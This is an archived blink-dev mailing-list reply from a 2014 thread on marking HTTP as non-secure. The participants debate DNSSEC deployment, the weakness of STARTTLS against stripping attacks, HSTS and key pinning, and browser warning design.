Re: [blink-dev] Re: Proposal: Marking HTTP As Non-Secure

On Dec 27, 2014 1:08 AM, "Austin William Wright" <aaa@bzfx.net> wrote:
>
>
>
> On Fri, Dec 26, 2014 at 11:36 PM, Ryan Sleevi <rsleevi@chromium.org>
wrote:
>
> (snip)
>
>> >>
>> >> That is, the standard could have provided policy and the site could
>> >> have sent a policy that governed the pinset. The site could have
>> >> allowed an override or denied an override. But it was decided all
>> >> users must be subjected to the interception, so the policy elements
>> >> were not provided.
>> >>
>> >> So how's that for strategy: the user does not get a choice in their
>> >> secure connection and the site does not get a choice in its secure
>> >> connection. Rather, some unrelated externality makes the choice.
>> >
>> >
>> > I share your concerns, and more: Public Key Pinning (and Strict
Transport Security, for that matter) is awfully specific to HTTP, even
though it has nothing to do with HTTP at all. The proper place to put this
information is in DNS records. This has worked reasonably well for Email;
or at least I don't see anyone proposing we query SMTP servers for relevant
security metadata.
>>
>> I assume that you aren't familiar with STARTTLS? The encryption and
security story for email is disastrously worse than anything for HTTP.
>>
>> > So why do this for HTTP? (If one wants to answer that properly
stopping forged headers is less important than stopping plaintext cat
pictures, color me surprised; if it's because it's a better alternative
than unencrypted DNS records for those lacking DNSSEC, that's a better
answer, but it's still relegates HPKP and HSTS to the realm of "stopgap
measure".)
>> >
>> > Austin.
>>
>> Indeed. From the point of view of client applications, DNSSEC is a
complete and utter failure, and will remain so for the next decade, given
hardware cycles. If a decade sounds like a stopgap measure, when it was
longer than the relevant lifetime of sites like Myspace, so be it, but that
seems like a pretty good run to me.
>
>
> I would challenge this notion: The deployment cycle doesn't seem to be
that much longer than TLS (underneath HTTP). SSL was first available in
1995, standardized 1996, almost twenty years ago. TLS 1.0 came out 1999 and
we STILL have user-agents that will happily downgrade to SSL 3.0. (I don't
claim to be a TLS/DNSSEC historian, feel free to correct me.)

I suspect we are far diverging from the topic at hand, so I won't respond
in depth.

>
> While efforts to secure DNS began about the same time, the modern DNSSEC
was first operational around 2004, and the first Key Signing Ceremony was
only in 2010! I find it fully usable, for those applications that support
it. At the application client level, I haven't found any reasons to not
support it.
>

There are a tremendous amount of issues. Frankly, old hardware (e.g.
systems running Windows XP, old home routers, old core routers) needs to go
away. They either lack DNSSEC in any sensible level or they actively block
it.

Again, this isn't an opinion: support for DNSSEC in client networks and on
client software is awful. Not a "fix Chrome" awful, but "fix the Internet,
the software stack, the OS" awful.

Beyond all of the operational security issues (which EXCEED those of CAs in
many ways), the reality is that it is IPv6 in a pre-RFC 3542 world.

> I would venture to guess that Web browsers and other user-agents could
make a better impact by deploying DNSSEC support, over forcing TLS usage.
The former adds more options for security; the latter imposes costs on
users of TLS, whether or not the existing system suits their needs.

Nope. Wrong wager.

>
> I don't see anything wrong with STARTTLS; in fact I find it preferable to
having seperate URI schemes for what is otherwise the same resource. (I
don't actually run any email servers, but I use STARTTLS with LDAP, XMPP, a
proprietary protocol, and the similar RFC 2817 for HTTP. That is, in fact,
a thing.) If one requires security, they can always start requests with
"STARTTLS"; if a server demands security (for its definition of security),
then it can just kill plaintext queries.

Again, as with HTTP, an attacker can easily strip out the STARTTLS. There
are many who already do. The server cannot reject plaintext queries - the
attacker need just SSLStrip them.

In short, it provides zero effective security without supplemental out of
band policy.

> Nor do I find deployment of TLS on email systems to be particularly
behind TLS on HTTP (do you have data on this?).

Multiple organizations, including Google, provide scorecards on TLS support.

There is no question it is behind compared to HTTP.

But more importantly, and to the point in which I was originally responding:
1) SMTP/IMAP do not use DNS to deliver security policy.
2) DNSSEC is a presently-failed technology. That it might improve is a
possibility, but not with today's internet
3) DNSSEC is less secure than the CA system, for many reasons
4) most importantly, the lack of a scheme and the opportunistic encryption
employed by SMTP make it no different than HTTP - an active attacker can
break confidentiality, integrity, or authenticity with near-zero effort,
and in a way that people would be surprised to realize.

People assume that emails are like letters in envelopes, when in reality
they are postcards. Comparing HTTP to email would be one of the few things
doable to make it worse.

> In particular, I do like Alex Russell's assertion that TLS is about
"quality of service" (if I understand correctly; my response point being
this is not exclusively what security entails), and this is something that
exists below the application layer.
>
> Austin.
>
>>
>> >
>> >>
>> >>
>> >> Jeff
>> >>
>> >> On Fri, Dec 26, 2014 at 8:33 PM, Austin William Wright <aaa@bzfx.net>
wrote:
>> >> >
>> >> > On Wed, Dec 24, 2014 at 3:43 PM, Alex Russell <
slightlyoff@google.com>
>> >> > wrote:
>> >> >> ...
>> >> >>
>> >> >> No, the request for a resource means something. Security is about
the
>> >> >> quality of service in delivering said thing.
>> >> >
>> >> > Specifically, I refer to privacy and authentication (which seems to
be what
>> >> > "security" means here). There's many components to security, and
they're not
>> >> > all going to be desired at the same level for every request,
sometimes even
>> >> > at odds with each other. Deniability is a particularly expensive
one to
>> >> > implement, often at significant monetary and performance cost to
the user.
>> >> > Deniability is simply not implemented by any website (or more
accurately,
>> >> > any authority) indexed by the major search engines.
>> >> >
>> >> > It's difficult to claim that deniability, though, is about "quality
of
>> >> > service", but it is nonetheless considered something _very_
important by
>> >> > Tor, and by users of it.
>> >> >
>> >> >>
>> >> >> > HTTP could mean, simply, "I don't care about security".
>> >> >>
>> >> >> Then user agents should be free to act on behalf of users to write
off
>> >> >> correspondents who do not value the user enough to protect the
message in
>> >> >> transit.
>> >> >>
>> >> >> You're making claims about what UA's must do from the perspective
of
>> >> >> servers; this is a clear agency problem misunderstanding.
>> >> >>
>> >> >> We're the user's agent, not the publisher's.
>> >> >
>> >> > When a user navigates to an https:// resource, or hits the checkbox
for
>> >> > STARTTLS, or selects "Require encryption" from a drop-down, they,
the user,
>> >> > are *demanding* a secure connection (for someone's definition of
secure;
>> >> > traditionally this means privacy and authentication but need not
include
>> >> > deniability).
>> >> >
>> >> > If we want to talk about the perspective of servers, the server has
options
>> >> > to demand a secure connection too; it simply has to deny plaintext
requests
>> >> > (it could redirect, but this risks the user-agent sending sensitive
>> >> > information including request-uri that'll just be ignored), and TLS
can
>> >> > specifically ask for or require a client TLS certificate for
authentication.
>> >> >
>> >> > The user-agent works for the user, not the other way around.
Letting a
>> >> > user-agent intervene in the case of a plaintext request is imposing
a value
>> >> > on the user: It prioritizes privacy over "DO NOT BREAK USERSPACE!"
which is
>> >> > not *necessarily* true.
>> >> >
>> >> > If TLS were free or very cheap to implement, however, this would be
a
>> >> > non-issue. Hence my treatment of ways to do this.
>> >> >
>> >> > Even if the http-as-non-secure proposal fully worked; it still
increases the
>> >> > cost of publishing content and barriers to entry. I recall Tim
Berners-Lee
>> >> > recollecting that requiring users mint a long-lived URI was
concerning cost;
>> >> > but there was no other way to design a decentralized Web. (In the
end, the
>> >> > biggest barrier to entry has been acquisition of a domain name and
hosting.)
>> >> >
>> >> > Of course, if efficiency and security are at odds, then we prefer
security.
>> >> > However, I see making TLS implementation cheaper as a viable
alternative to
>> >> > this proposal, and so is far more appealing.
>> >> >>
>> >> >> > A TLS failure means "Security is _required_ by the other party,
but
>> >> >> > couldn't be set up and verified. Abort! Abort!"
>> >> >> >
>> >> >> > Purporting that plaintext and HTTPS failure is the same would be
>> >> >> > conditioning users to be less worried about HTTPS failures,
where there's a
>> >> >> > known _requirement_ for confidentiality.
>> >> >>
>> >> >> The UA could develop different (but also scary) UI for these
conditions.
>> >> >
>> >> > I am specifically referring to the part of the proposal that, in
the long
>> >> > term, specifies no UI difference between plaintext and failed-TLS.
>> >> >
>> >> > Would you care to make an alternate proposal with this change?
>> >> >>
>> >> >> Regardless, we have done a poor job communicating the effective
system
>> >> >> model (that content is not tamper-evidentwhen served over HTTP).
Steps to
>> >> >> make this clearer aren't the same thing as throwing all distinction
>> >> >> overboard.
>> >> >>
>> >> >> > There may be some value in saying "as with many network requests,
>> >> >> > request/submission is being sent in the clear. Anyone on your
network will
>> >> >> > be able to read this!". But big scary warnings are most
certainly bad. No
>> >> >> > matter what, before I claim anything for sure, I would like to
see a
>> >> >> > double-blind study, and not change for the sake of change.
>> >> >>
>> >> >> This sort of argument might have worked in '12. Apologies, but
you're
>> >> >> dreadfully late.
>> >> >
>> >> > I'm afraid snark wasn't my first language, so you'll have to
refresh my
>> >> > memory: what are you referring to?
>> >> >
>> >> > Earlier in my message, I touched on the danger of users dismissing
warnings
>> >> > for their e.g. bank, because users become dismissive of "insecure
>> >> > connection" warnings found elsewhere.
>> >> >
>> >> > Now, we might have HSTS (for my bank example), but at that point
we're no
>> >> > longer talking about two tiers of security, but three
(insecure-bypassable,
>> >> > insecure-nonbypassable, secure), which is precisely what the
proposal is
>> >> > advocating moving _away_ from (or, the proposal is not very clear
on this
>> >> > point, and a clarification in its text would be necessary).
>> >> >> ...
>> >
>> >
>
>

Received on Saturday, 27 December 2014 09:19:11 UTC